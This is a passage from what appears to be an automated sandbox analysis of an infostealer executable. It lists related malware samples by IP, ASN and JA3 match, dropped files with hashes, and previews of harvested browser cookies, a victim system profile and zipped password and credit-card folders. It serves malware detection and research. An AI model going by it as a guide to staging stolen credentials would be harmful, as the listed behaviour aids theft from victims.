                                      • 195.201.57.90
                                      01vwXiyQ8K.exeGet hashmaliciousQuasarBrowse
                                      • 195.201.57.90
                                      api.telegram.orgClipper.exeGet hashmaliciousUnknownBrowse
                                      • 149.154.167.220
                                      Cryptor.exeGet hashmaliciousLuca StealerBrowse
                                      • 149.154.167.220
                                      Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                      • 149.154.167.220
                                      9JVOOyGBXT.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 149.154.167.220
                                      ajb5QcGVGK.exeGet hashmaliciousDCRatBrowse
                                      • 149.154.167.220
                                      SecuriteInfo.com.Trojan.AutoIt.1390.21633.8031.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 149.154.167.220
                                      Attachments.zipGet hashmaliciousUnknownBrowse
                                      • 149.154.167.220
                                      DHL DOC..exeGet hashmaliciousAgentTeslaBrowse
                                      • 149.154.167.220
                                      hesaphareketi-01.exeGet hashmaliciousAgentTeslaBrowse
                                      • 149.154.167.220
                                      sipari#U015f formu_831512.exeGet hashmaliciousAgentTeslaBrowse
                                      • 149.154.167.220

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      TELEGRAMRUClipper.exeGet hashmaliciousUnknownBrowse
                                      • 149.154.167.220
                                      Cryptor.exeGet hashmaliciousLuca StealerBrowse
                                      • 149.154.167.220
                                      Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                      • 149.154.167.220
                                      SecuriteInfo.com.Win64.Evo-gen.4435.12354.exeGet hashmaliciousCryptOne, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                      • 149.154.167.99
                                      9JVOOyGBXT.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 149.154.167.220
                                      ajb5QcGVGK.exeGet hashmaliciousDCRatBrowse
                                      • 149.154.167.220
                                      http://www.aviatorx.sbs.recl.cc/Get hashmaliciousUnknownBrowse
                                      • 149.154.167.99
                                      http://telegram-vn.com/Get hashmaliciousUnknownBrowse
                                      • 149.154.167.99
                                      http://dl.dir.freefiremobile.com.sg5.putrivpn.biz.id/Get hashmaliciousUnknownBrowse
                                      • 149.154.167.99
                                      http://b9824.top/Get hashmaliciousUnknownBrowse
                                      • 149.154.170.96
                                      HETZNER-ASDEClipper.exeGet hashmaliciousUnknownBrowse
                                      • 195.201.57.90
                                      Cryptor.exeGet hashmaliciousLuca StealerBrowse
                                      • 195.201.57.90
                                      Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                      • 195.201.57.90
                                      SecuriteInfo.com.Win64.Evo-gen.4435.12354.exeGet hashmaliciousCryptOne, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                      • 159.69.102.132
                                      3Lf408k9mg.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                      • 116.202.102.103
                                      PAYMENT RECEIPT.exeGet hashmaliciousFormBookBrowse
                                      • 178.63.50.103
                                      RFQ price list.scr.exeGet hashmaliciousUnknownBrowse
                                      • 88.99.137.18
                                      Revised Order.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                      • 135.181.212.206
                                      RFQ price list.scr.exeGet hashmaliciousUnknownBrowse
                                      • 88.99.137.18

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      3b5074b1b5d032e5620f69f9f700ff0eClipper.exeGet hashmaliciousUnknownBrowse
                                      • 149.154.167.220
                                      Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                      • 149.154.167.220
                                      SecuriteInfo.com.Win32.Malware-gen.18534.23013.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                      • 149.154.167.220
                                      Authenticator.exeGet hashmaliciousBazaLoaderBrowse
                                      • 149.154.167.220
                                      Payment Advice Ref 20240516908654223454899.scr.exeGet hashmaliciousUnknownBrowse
                                      • 149.154.167.220
                                      Aviz de Plata_Comert_Bank_pdf.scr.exeGet hashmaliciousUnknownBrowse
                                      • 149.154.167.220
                                      IKwhIZp9xe.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 149.154.167.220
                                      Aviz de Plata_Comert_Bank_pdf.scr.exeGet hashmaliciousUnknownBrowse
                                      • 149.154.167.220
                                      Biodu Kenya Ltd.exeGet hashmaliciousUnknownBrowse
                                      • 149.154.167.220
                                      file.exeGet hashmaliciousAgentTeslaBrowse
                                      • 149.154.167.220

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):0.773832331134527
                                      Encrypted:false
                                      SSDEEP:3:NlllulD/:NllUD
                                      MD5:D9ADDC8BC71EE61261940D67A7EFF73A
                                      SHA1:44DABE2479B4D251FC348A7198B3F5665BC48F5C
                                      SHA-256:3945C70445A1C3E3E162F1EE5EBBD03C93D3D4483316AE2AF1D9C025D0B204A7
                                      SHA-512:87100FEF4AB233A92DD99E02668390D1C546DEB0DB9E1E7C470E1AC9D63A36C64081E31262786128526FF2FE223E883DBF338587A55A961F6CB7C38A419967AE
                                      Malicious:false
                                      Reputation:low
                                      Preview:@...e.................................R.........................

                                      C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Cookies\Chrome_Default_Network.txt

                                      Download File
                                      Process:C:\Users\user\Desktop\cOQD62FceM.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):286
                                      Entropy (8bit):5.7588025104123
                                      Encrypted:false
                                      SSDEEP:6:PkU6WtDxbuQ0cKGWGcsGG1NOpFw+5uQ+Cy8HfyUhEqXfL6vRpAn:cU99EQ07BGcW1NOpFwUuQLHaU9WvHA
                                      MD5:07691E9F2983932701060D0FC5588075
                                      SHA1:878CA50CCD13F2DDA9C55B158B1D41F17636AA5A
                                      SHA-256:7F831E59CC96BDF3B1E0235B7D75201F2545F4F90DD43965E3B69B2FEFD9FD4E
                                      SHA-512:399B1FBA58B2CE804CF988C0C8E123477B43D0C4F426BCF1DA389D5C59BE9D03B640454E60D89D51DE5087E5601CBF591779884678279925552D7B8BD8EC6461
                                      Malicious:false
                                      Reputation:low
                                      Preview:.google.com.false./.true.13343492415760663.1P_JAR.2023-10-04-13...google.com.true./.true.13356711615760707.NID.511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4

                                      C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\screen1.png

                                      Download File
                                      Process:C:\Users\user\Desktop\cOQD62FceM.exe
                                      File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                      Category:dropped
                                      Size (bytes):946062
                                      Entropy (8bit):7.579026396072125
                                      Encrypted:false
                                      SSDEEP:12288:Y6y+RxAj5C4S3alnLooVrD550To7wCusv/XCcA/8zWLJrD7c6kMB:Y6f0JuQLDVj7f/XWme
                                      MD5:FA14806DE0A47A371E812939E90B9DE4
                                      SHA1:34E42A9BBC1D4DE5EBBC5C5BE1699FCB41C5F5F1
                                      SHA-256:D8327A332B5A7DF5CCA3325BB0158242F86009E41E08C0FFFF3895D1FA418123
                                      SHA-512:44242D8866944C8F424C95F2681A050997670EE136ABE5D60E7AA74659D63E3B5CEA8FBAA257E59FAA8FD6FDD0D6AE695360F516516AEB363C43CD2CF85D80F4
                                      Malicious:false
                                      Reputation:low
                                      Preview:.PNG........IHDR................C..oUIDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6...".....I)..H""..L.$a..I.d&...$.R..m$!..d&..$$.....~...@)..`.&."...d..T..Ak.Z+.V.i...m.i"3). .....q..@...Mf..H"".L2..D...U2..D...m.q$....&.If.../"..$.2...6..$.(".Df..H....8.d&..@f.PJ.6..`...O..Af.0M.}.Ske.^s?..D....@D....IHB..If...R....ls?.R.Dk........d&...... "h.1...m2..IB..

                                      C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\sensitive-files.zip

                                      Download File
                                      Process:C:\Users\user\Desktop\cOQD62FceM.exe
                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                      Category:dropped
                                      Size (bytes):29967
                                      Entropy (8bit):7.844352900924057
                                      Encrypted:false
                                      SSDEEP:768:nkKkSnynTSoacScocQk5/kKkSnynScoa7ScocL8:nkKkSnynlCcocQkNkKkSnyn+lcocQ
                                      MD5:25B555D9B19ACFF815941C2CD455D62D
                                      SHA1:B78FBE19038EAA8C7BA61CC42CD4DC74F732337B
                                      SHA-256:BB9513E6C63F62E7D323C879488B0ED00B5E00FB78B18EC0FE8342977550D6BE
                                      SHA-512:1CDB078500B65771307580340AF72D501E490A8D4C7B13B178EE49230AF3CD6A38844682F032925A6589114BFEA0CBA5A85ACBEEEB47C2B7EE890269F3FE7E47
                                      Malicious:false
                                      Reputation:low
                                      Preview:PK...........X...s............BJZFPPWAPT.docx..I.@!.D........8{....#.@.P.R..~}..t...npl....oTd..Q./.w!..w.C}.......C.5........B..f.79..=.zS...5.1.6.Y....z.N.|oEt...#o..P.y.+..-z..T.y...^c......pF.a..).Z.W.*[je=lm...]X5/.{......pi...c.XV....&*.+t..!..5d5fUpm....t......QQ.1.........F..c.........1..e.7G......QGU.sF4...:.T..:..6..ow.L16O....2..#Q..[.(.z.....3..W6...Q..1.JQ..f.............L0C].. ..&..6Yy}....).e.M,.{8..h'...=4...'..kg......l..W.-.<.....@r..b.p}.M7o...*.._z. l..G.K.}./..U<*..b.95N4J.....Omf.E..f..+...&...v......(I.....v..>.i..J.^.../.C.K..Y.....yr....].V..-...f<...E|).....t..~.t.F.o.g......U.Wa...W;.bM.V.M...,......2............?PK...........X...s............BJZFPPWAPT.xlsx..I.@!.D........8{....#.@.P.R..~}..t...npl....oTd..Q./.w!..w.C}.......C.5........B..f.79..=.zS...5.1.6.Y....z.N.|oEt...#o..P.y.+..-z..T.y...^c......pF.a..).Z.W.*[je=lm...]X5/.{......pi...c.XV....&*.+t..!..5d5fUpm....t......QQ.1.........F..c.........1

                                      C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\user_info.txt

                                      Download File
                                      Process:C:\Users\user\Desktop\cOQD62FceM.exe
                                      File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
                                      Category:dropped
                                      Size (bytes):669
                                      Entropy (8bit):5.355364439931774
                                      Encrypted:false
                                      SSDEEP:12:eM36nIQN3eyQ8bjx6YYbrJFz1eXOlQM7NlVa1JBQM3aWfgyIHdAMij01+ajXaBLF:exVNbxxVYBvIHM7NlVafe8dOAMijUlqD
                                      MD5:1609FFB86FC6AC8A96E2BCFE39C4F217
                                      SHA1:4223B49D1A9943D4C8BB9C7CB2A8C21944664450
                                      SHA-256:0035BB7FB3F3A4831A32CD1F56174995E453A1EE53B2F44B1AD9DD654B66A463
                                      SHA-512:DEAAD1BA9DF21F4A73786C6C98AECD8F52E51483724DF8FB36FF4C22D98D83B7CBDA2905D6AEF8BAE94360922E0110E375FB0B67F6E4CB724B94A526DC8FEEC5
                                      Malicious:false
                                      Reputation:low
                                      Preview:..- IP Info -....IP: 173.254.250.91..Country: United States..City: Dallas..Postal: 75201..ISP: Quadranet Enterprises LLC - A8100..Timezone: -05:00....- PC Info -....Username: user..OS: Microsoft Windows 10 Pro..CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..GPU: .. - E26RT4853 (1280, 1024)..HWID: 5059308222394286..Current Language: English (United States)..FileLocation: C:\Users\user\Desktop\cOQD62FceM.exe..Is Elevated: true....- Other Info -....Antivirus: .. - Windows Defender....- Log Info -......Build:_____....Passwords: ....Cookies: . 2...Wallets: ....Files: . 40...Credit Cards: ....Servers FTP/SSH: ....Discord Tokens: ....Others: ..

                                      C:\Users\user\AppData\Local\Temp\Cookies

                                      Download File
                                      Process:C:\Users\user\Desktop\cOQD62FceM.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                      Category:dropped
                                      Size (bytes):20480
                                      Entropy (8bit):0.6732424250451717
                                      Encrypted:false
                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\History

                                      Download File
                                      Process:C:\Users\user\Desktop\cOQD62FceM.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                      Category:dropped
                                      Size (bytes):155648
                                      Entropy (8bit):0.5407252242845243
                                      Encrypted:false
                                      SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                      MD5:7B955D976803304F2C0505431A0CF1CF
                                      SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                      SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                      SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\Login Data

                                      Download File
                                      Process:C:\Users\user\Desktop\cOQD62FceM.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                      Category:dropped
                                      Size (bytes):51200
                                      Entropy (8bit):0.8746135976761988
                                      Encrypted:false
                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\Web Data

                                      Download File
                                      Process:C:\Users\user\Desktop\cOQD62FceM.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                      Category:dropped
                                      Size (bytes):196608
                                      Entropy (8bit):1.121297215059106
                                      Encrypted:false
                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                      Malicious:false
                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bvzefap1.f4q.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wi3j0d0r.btg.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\out.zip

                                      Download File
                                      Process:C:\Users\user\Desktop\cOQD62FceM.exe
                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                      Category:dropped
                                      Size (bytes):979916
                                      Entropy (8bit):7.600298847346435
                                      Encrypted:false
                                      SSDEEP:12288:96y+RxAj5C4S3alnLooVrD550To7wCusv/XCcA/8zWLJrD7c6kMvylyi:96f0JuQLDVj7f/XWm0ylyi
                                      MD5:D2026B1DC5D6012C2F258FF0D105038E
                                      SHA1:08B2AA4CADD1846D1E1D9C326D3A2704F02ADAB0
                                      SHA-256:807468EDD99D6C38CCC68B9E47F5694A441264BF625707CFC4AB1C4C62EFFFD6
                                      SHA-512:392DABF0D063DD2ACB82F0B1DAB71A441707D108D637012CEE0F0373363926B0746D53542A4F4482E34790BA29645A645BAE2FADB285834D8995DDA12A158D03
                                      Malicious:false
                                      Preview:PK...........X................Autofill/PK...........X................Cookies/PK...........X................CreditCards/PK...........X................Downloads/PK...........X................History/PK...........X................Passwords/PK...........X..Hh.o...o......screen1.png.PNG........IHDR................C..oUIDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6.

                                      C:\Users\user\AppData\Local\Temp\sensitive-files.zip

                                      Download File
                                      Process:C:\Users\user\Desktop\cOQD62FceM.exe
                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                      Category:dropped
                                      Size (bytes):29967
                                      Entropy (8bit):7.844352900924057
                                      Encrypted:false
                                      SSDEEP:768:nkKkSnynTSoacScocQk5/kKkSnynScoa7ScocL8:nkKkSnynlCcocQkNkKkSnyn+lcocQ
                                      MD5:25B555D9B19ACFF815941C2CD455D62D
                                      SHA1:B78FBE19038EAA8C7BA61CC42CD4DC74F732337B
                                      SHA-256:BB9513E6C63F62E7D323C879488B0ED00B5E00FB78B18EC0FE8342977550D6BE
                                      SHA-512:1CDB078500B65771307580340AF72D501E490A8D4C7B13B178EE49230AF3CD6A38844682F032925A6589114BFEA0CBA5A85ACBEEEB47C2B7EE890269F3FE7E47
                                      Malicious:false
                                      Preview:PK...........X...s............BJZFPPWAPT.docx..I.@!.D........8{....#.@.P.R..~}..t...npl....oTd..Q./.w!..w.C}.......C.5........B..f.79..=.zS...5.1.6.Y....z.N.|oEt...#o..P.y.+..-z..T.y...^c......pF.a..).Z.W.*[je=lm...]X5/.{......pi...c.XV....&*.+t..!..5d5fUpm....t......QQ.1.........F..c.........1..e.7G......QGU.sF4...:.T..:..6..ow.L16O....2..#Q..[.(.z.....3..W6...Q..1.JQ..f.............L0C].. ..&..6Yy}....).e.M,.{8..h'...=4...'..kg......l..W.-.<.....@r..b.p}.M7o...*.._z. l..G.K.}./..U<*..b.95N4J.....Omf.E..f..+...&...v......(I.....v..>.i..J.^.../.C.K..Y.....yr....].V..-...f<...E|).....t..~.t.F.o.g......U.Wa...W;.bM.V.M...,......2............?PK...........X...s............BJZFPPWAPT.xlsx..I.@!.D........8{....#.@.P.R..~}..t...npl....oTd..Q./.w!..w.C}.......C.5........B..f.79..=.zS...5.1.6.Y....z.N.|oEt...#o..P.y.+..-z..T.y...^c......pF.a..).Z.W.*[je=lm...]X5/.{......pi...c.XV....&*.+t..!..5d5fUpm....t......QQ.1.........F..c.........1

                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

                                      Download File
                                      Process:C:\Users\user\Desktop\cOQD62FceM.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):32768
                                      Entropy (8bit):0.017262956703125623
                                      Encrypted:false
                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                      Malicious:false
                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      Static File Info

                                      General

                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Entropy (8bit):6.370985643803525
                                      TrID:
                                      • Win64 Executable GUI (202006/5) 92.65%
                                      • Win64 Executable (generic) (12005/4) 5.51%
                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                      • DOS Executable Generic (2002/1) 0.92%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:cOQD62FceM.exe
                                      File size:5'484'544 bytes
                                      MD5:af412b399914b80044340ade572bf2ab
                                      SHA1:448557087815068ea337905a61f83f02eee47c07
                                      SHA256:17b420104131c59619411e4732743ec8e9c373228613ee23731c1fd239fac7dd
                                      SHA512:f0b96f922abcf9ede936073142690b53848ea8787730936d73ea6d0ac57174efbe730388b164c83b63d3dd4c93f17fface89fac24f107dd21b46f83ca9cc9f76
                                      SSDEEP:98304:YVbklhGDTqHiSYvbuVqvxKBWwD3ZLr9IKynfJy:YqluBudBW4Lr9IKm
                                      TLSH:84468C43F6A581E9C0AEC174875B9323FB32BC890621B79B5BD49A213F23B605F5D358
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{.dC?...?...?...6...-..._......._...2..._...6.......)...+...<...?.......[...%...?...8...[...>...Rich?..........................

                                      File Icon

                                      Icon Hash:00928e8e8686b000

                                      Static PE Info

                                      General

                                      Entrypoint:0x1403aaee0
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x140000000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x664FF26D [Fri May 24 01:50:37 2024 UTC]
                                      TLS Callbacks:0x4023b620, 0x1
                                      CLR (.Net) Version:
                                      OS Version Major:6
                                      OS Version Minor:0
                                      File Version Major:6
                                      File Version Minor:0
                                      Subsystem Version Major:6
                                      Subsystem Version Minor:0
                                      Import Hash:a570918faa90d4e27bbdd3bedba90c46

                                      Entrypoint Preview

                                      Instruction
                                      dec eax
                                      sub esp, 28h
                                      call 00007FC528DD1668h
                                      dec eax
                                      add esp, 28h
                                      jmp 00007FC528DD0E97h
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      nop word ptr [eax+eax+00000000h]
                                      dec eax
                                      sub esp, 10h
                                      dec esp
                                      mov dword ptr [esp], edx
                                      dec esp
                                      mov dword ptr [esp+08h], ebx
                                      dec ebp
                                      xor ebx, ebx
                                      dec esp
                                      lea edx, dword ptr [esp+18h]
                                      dec esp
                                      sub edx, eax
                                      dec ebp
                                      cmovb edx, ebx
                                      dec esp
                                      mov ebx, dword ptr [00000010h]
                                      dec ebp
                                      cmp edx, ebx
                                      jnc 00007FC528DD1038h
                                      inc cx
                                      and edx, 8D4DF000h
                                      wait
                                      add al, dh

                                      Rich Headers

                                      Programming Language:
                                      • [IMP] VS2008 SP1 build 30729

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x516d4c0x1a4.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x5200000x14850.pdata
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x5360000x8690.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x509b800x28.rdata
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x5099d00x140.rdata
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x3ba4a00x3ba60059c3b5cdba585309d77d3d21420617a2unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x3bc0000x15ce580x15d000456be673f895c7841b9ff24db19bc678False0.3754728912965616data5.463600247898426IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
